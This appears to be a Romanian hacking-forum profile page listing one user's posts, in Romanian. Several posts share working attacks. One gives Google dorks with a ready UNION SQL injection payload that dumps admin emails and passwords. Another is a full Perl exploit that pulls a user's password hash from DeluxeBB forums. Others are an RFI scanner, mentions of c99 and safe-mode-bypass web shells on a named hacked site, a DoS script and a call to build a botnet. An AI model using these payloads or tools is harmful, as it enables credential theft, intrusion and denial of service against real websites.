Jump to content

paxnWo

Active Members
  • Posts

    2743
  • Joined

  • Last visited

  • Days Won

    18

Everything posted by paxnWo

  1. pai scrie acolo ... 60.169.11.188:80 | anonymous | China ip : 60.169.11.188 port : 80
  2. tu nu simti muzica ... tu esti muzica
  3. ia de aici proxy : darkc0de.com [ Proxy Lookup Results ] daca ai firefox , te duci la tools > options > advanced > settings > manual proxy configuration
  4. a folosit 3 shelluri : c99, sniper_sa si tryag . ( scrie la sfarsitul tutorialului ) nu a folosit niciun soft. scrie in notepad++ .
  5. nu ati trecut peste subiectul asta ? =/ folositi firefox si gata
  6. paxnWo

    Greva

    eu facusem articolul ala . l-au sters adminii
  7. paxnWo

    Greva

    Asociatia Brokerilor
  8. va place ? Reduce The Odds
  9. face articole ca sa n'adoarma sau ca sa ii viziteze blogul cocalarii ce's impotriva rst .
  10. cautati pe google oricare dintre : allinurl: \"index php go buy\" allinurl: \"index.php?go=sell\" allinurl: \"index php go linkdir\" allinurl: \"index.php?go=resource_center\" allinurl: \"resource_center.html\" allinurl: \"index.php?go=properties\" allinurl: \"index.php?go=register\" luati fiecare site gasit in parte si adaugati : index.php?go=detail&id=-99999/**/union/**/select/**/0,0,0,0,0,0,0,0,0,0,0x7c,email,0x3a,concat(username,0x3a,password),1,1,1,1,1,1,2,2,2,2,2/**/from/* */admin/*where,limit,2-- am postat ca sa nu vad dup'aia Show-off'ul plin .
      • 1
      • Downvote
  11. <?php /*************************************************************************** * PHP Security-Shell RFI Scanner v1.0 * * * * Copyright (C) 2007 by pentest * * * * http://security-sh3ll.com * * * * This program is free software; you can redistribute it and/or modify * * it under the terms of the GNU General Public License as published by * * the Free Software Foundation; either version 2 of the License, or * * (at your option) any later version. * * * * This program is distributed in the hope that it will be useful, * * but WITHOUT ANY WARRANTY; without even the implied warranty of * * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * * GNU General Public License for more details. * * * ***************************************************************************/ $escan_inc_regex = array( '/include(_once)?.\$/ix', '/require(_once)?.\$/ix' ); /* Regex to extract the names of variables */ $escan_var_regex = array( '/\Ainclude(_once)?./is', '/\Arequire(_once)?./is' ); /* Array of file extensions to scan */ $escan_valid_ext = array( 'php' ); /* Maximum size of a file to scan, scans all if 0 */ $escan_max_size = 0; /* Counter crawled directory */ $escan_dir_count = 0; /* Perpetual scanned files */ $escan_file_count = 0; /* Perpetual potential rfi found */ $escan_match_count = 0; /*Perpetual crawled total bytes */ $escan_byte_count = 0; escan_banner(); if( $argc < 2 ){ escan_usage($argv[0]); } else{ $stime = escan_get_mtime(); escan_recurse_dir( realpath($argv[1]).DIRECTORY_SEPARATOR ); $etime = escan_get_mtime(); print "\n@ Scan report : \n\n" . "\t$escan_dir_count directory .\n". "\t$escan_file_count file .\n". "\t" . escan_format_size($escan_byte_count) . " .\n". "\t$escan_match_count Potential RFI .\n". "\t".($etime-$stime) . " Second Processing .\n\n"; } /* A string formats in a magnitude expressed in bytes */ function escan_format_size($bytes) { if( $bytes < 1024 ) return "$bytes bytes"; if( $bytes < 1048576 ) return ($bytes / 1024) . " Kb"; if( $bytes < 1073741824 ) return ($bytes / 1048576) . " Mb"; return ($bytes / 1073741824) . " Gb"; } /* Returns the timestamp in seconds */ function escan_get_mtime() { list($usec, $sec) = explode(" ",microtime()); return ((float)$usec + (float)$sec); } /* Extracts line of code inclusion */ function escan_scan_line($content,$offset) { list( $line, $dummy ) = explode( ";" , substr($content,$offset,strlen($content)) ); return $line.";"; } /* Extract the variable name from line of code inclusion */ function escan_parse_var( $line, $regex_id ) { global $escan_var_regex; $vars = preg_split($escan_var_regex[$regex_id],$line); $varname = $vars[1]; $delimiters = " .);"; for( $i = 0; $i < strlen($varname); $i++ ){ for( $j = 0; $j < strlen($delimiters); $j++ ){ if($varname[$i] == $delimiters[$j]){ return substr( $varname, 0, $i ); } } } return $varname; } /* Check if the variable $var is defined in $content before position $offset*/ function escan_check_definitions($content,$offset,$var) { if( strpos( $var, "->" ) ){ return 1; } $chunk = substr($content,0,$offset); $regex = "/".preg_quote($var,"/")."\s*=/ix"; preg_match( $regex, $chunk,$matches ); return count($matches); } /* $file the file to check for potential rfi */ function escan_parse_file($file) { global $escan_inc_regex; global $escan_max_size; global $escan_file_count; global $escan_match_count; global $escan_byte_count; $fsize = filesize($file); if( $escan_max_size && $fsize > $escan_max_size ) return; $escan_file_count++; $escan_byte_count += $fsize; $content = @file_get_contents($file); for( $i = 0; $i < count($escan_inc_regex); $i++ ){ if( preg_match_all( $escan_inc_regex[$i], $content, $matches, PREG_OFFSET_CAPTURE ) ){ $nmatch = count($matches[0]); for( $j = 0; $j < $nmatch; $j++ ){ $offset = $matches[0][$j][1]; $line = escan_scan_line($content,$offset); $var = escan_parse_var($line,$i); if( escan_check_definitions($content,$offset,$var) == 0 ) { $escan_match_count++; print "@ $file - \n\t- '$var' The position $offset .\n"; } } } } } /* Returns the file extension $fname */ function escan_get_file_ext($fname) { if( strchr($fname,'.') ){ return substr($fname,strrpos($fname,'.')+1); } else{ return ""; } } /* Check if file $fname is a valid extension */ function escan_isvalid_ext($fname) { global $escan_valid_ext; for( $i = 0; $i < count($escan_valid_ext); $i++ ){ if(strstr(escan_get_file_ext($fname),$escan_valid_ext[$i])){ return true; } } return false; } /* That function scans directories recursively */ function escan_recurse_dir($dir) { global $escan_dir_count; $escan_dir_count++; if( $cdir = @dir($dir) ){ while( $entry = $cdir->read() ){ if( $entry != '.' && $entry != '..' ){ if( is_dir($dir.$entry) ){ escan_recurse_dir($dir.$entry.DIRECTORY_SEPARATOR); } else{ if( escan_isvalid_ext($dir.$entry) ){ escan_parse_file($dir.$entry); } } } } $cdir->close(); } } function escan_banner() { print "*-----------------------------------------------------*\n" . "* PHP Security-Shell RFI Scanner v1.0 by pentest *\n" . "* *\n" . "* http://security-sh3ll.com *\n" . "*-----------------------------------------------------*\n\n"; } function escan_usage($pname) { print "Use : php $pname <dir>\n"; } ?>
  12. #!/usr/bin/perl use IO::Socket; print q{ ###################################################### # DeluxeBB Remote SQL Injection Exploit # # vbulletin Remote SQL Injection Exploit # ###################################################### }; if (!$ARGV[2]) { print q{ Usage: perl dbbxpl.pl host /directory/ victim_userid perl dbbxpl.pl www.nekisite.com /forum/ 1 }; } $server = $ARGV[0]; $dir = $ARGV[1]; $user = $ARGV[2]; $myuser = $ARGV[3]; $mypass = $ARGV[4]; $myid = $ARGV[5]; print "------------------------------------------------------------------------------------------------\r\n"; print "[>] SERVER: $server\r\n"; print "[>] DIR: $dir\r\n"; print "[>] USERID: $user\r\n"; print "------------------------------------------------------------------------------------------------\r\n\r\n"; $server =~ s/(http:\/\/)//eg; $path = $dir; $path .= "misc.php?sub=profile&name=0')+UNION+SELECT+0,pass,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0+FROM%20deluxebb_users%20WHERE%20(uid= '".$user ; print "[~] PREPARE TO CONNECT...\r\n"; $socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80") || die "[-] CONNECTION FAILED"; print "[+] CONNECTED\r\n"; print "[~] SENDING QUERY...\r\n"; print $socket "GET $path HTTP/1.1\r\n"; print $socket "Host: $server\r\n"; print $socket "Accept: */*\r\n"; print $socket "Connection: close\r\n\r\n"; print "[+] DONE!\r\n\r\n"; print "--[ REPORT ]------------------------------------------------------------------------------------\r\n"; while ($answer = <$socket>) { if ($answer =~/(\w{32})/) { if ($1 ne 0) { print "Password Hash is: ".$1."\r\n"; print "--------------------------------------------------------------------------------------\r\n"; } exit(); } } print "------------------------------------------------------------------------------------------------\r\n";
  13. i-am lasat un comment. sa ne bagam pula-n ma'sa de fript
  14. e veche faza . gasisem pe un warez toate dose-urile . e de kko .
  15. nu conteaza . posteaza aici : Club ShowOFF - Romanian Security Team - SECURITY RESEARCH
  16. 1.caut si eu un shell care sa dea bypass la safe-mode . stiu decat pe sniper_a pe care nu il gasesc . altceva ? 2. cum l-ai uploadat ? Windows 2003 (c) IIS : metro.iett.gov.tr 3.01-STABLE IIS 6.0-STABLE # 27.10.2008 08:10:51 sloboz incarca cam greu cu proxyu asta site-ul nu a mai fost updatat din 2004 lol . si e decat o data din 2006
  17. pai am stat pe irc pe #darkc0de care sunt aproape singurii care pun acccent pe python coding si le-am citit tutorialele . o parte din codul asta era inclus in tutoriale . am rezolvat sleepu in cele din urma
  18. paxnWo

    {#} Loic {#}

    avem de unde stai tu calm . adun eu si se mai baga lume
  19. welcome ma bucur ca vine lume pe rst .
  20. merci . o sa incerc .
  21. paxnWo

    {#} Loic {#}

    haideti sa facem o retea botnet marca RST
  22. paxnWo

    h4cky0u vip

    e de cacat vipul . nu pierdeti nimic vedeti ce faceti ss : daca nu incarca aveti aici direct link : http://img393.imageshack.us/img393/9683/hyoi2.jpg
  23. n-avem gl & hf
  24. Va luati python de aici : http://www.python.org/ftp/python/2.6/python-2.6.msi Scriptul : dos.py - 0.7 Kb il puneti in C . deschideti cmd si scrieti : cd c:/ dos.py aveti acolo instructiuni enjoy ! ps : trebuie sa aveti bandwidth mare daca vreti sa il folositi mie mi-a picat netul
  25. paxnWo

    {#} Loic {#}

    reformuleaza . denial-of-service attack (DoS attack) or distributed denial-of-service attack (DDoS attack) same shit.
×
×
  • Create New...